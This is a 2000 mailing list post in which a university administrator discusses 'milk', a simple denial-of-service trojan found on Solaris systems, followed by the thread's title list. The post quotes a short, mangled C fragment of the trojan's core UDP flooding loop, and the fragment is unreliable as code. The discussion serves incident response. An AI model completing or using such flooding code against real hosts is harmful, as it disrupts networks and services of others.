Security Incidents mailing list archives
Re: [UPDATE]Dos Trojan on Solaris
From: rslau () USC EDU (Robert Lau)
Date: Wed, 9 Feb 2000 16:54:13 -0800
Please let me know if you find the source code of this "milk" or whatever name appears to be in your system. Thanks!
As David Brumley said, milk is a simple DoS. It's a *very* simple program, something anybody with socket programming experience could whip up in a few minutes. milk (along with the ttdb, cmsd, and dt holes) are quite old, we saw it on our machines last summer. Its core looks like: to.sin_port = htons(rand()%65000); if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == perror("ignoring"); continue; } if(sendto(sock, buf, size, 0, (struct sockaddr*)(&to), sizeof(to)) == perror("ignoring"); } close(sock); } Robert Lau Information Services Division - Core Services University of Southern California
Current thread:
- Re: UDP to 161, (continued)
- Re: UDP to 161 Russell Fulton (Feb 15)
- Re: Private networks and home.{net|com} Andy Smith (Feb 09)
- massive unapproved AXFR's and odd rcvd NOTIFY's Paul Wouters (Feb 09)
- Re: massive unapproved AXFR's and odd rcvd NOTIFY's Francis A. Vidal (Feb 09)
- [UPDATE]Dos Trojan on Solaris Roderick Padilla (Feb 09)
- Re: [UPDATE]Dos Trojan on Solaris Ross Mueller (Feb 09)
- a very strange scan Boris Badenov (Feb 09)
- Re: a very strange scan Russell Fulton (Feb 10)
- Possible stacheldraht variant/probe Stephen P. Berry (Feb 09)
- Re: Possible stacheldraht variant/probe David Brumley (Feb 10)
- Re: [UPDATE]Dos Trojan on Solaris Robert Lau (Feb 09)
- Re: Strange traceroute Rob Quinn (Feb 08)
- vi as a suid Paulo Ribeiro (Feb 08)
- Re: Strange traceroute Hauke Johannknecht (Feb 08)
- Re: sendmail vunerability ? CyberPsychotic (Feb 07)
- Re: sendmail vunerability ? H D Moore (Feb 10)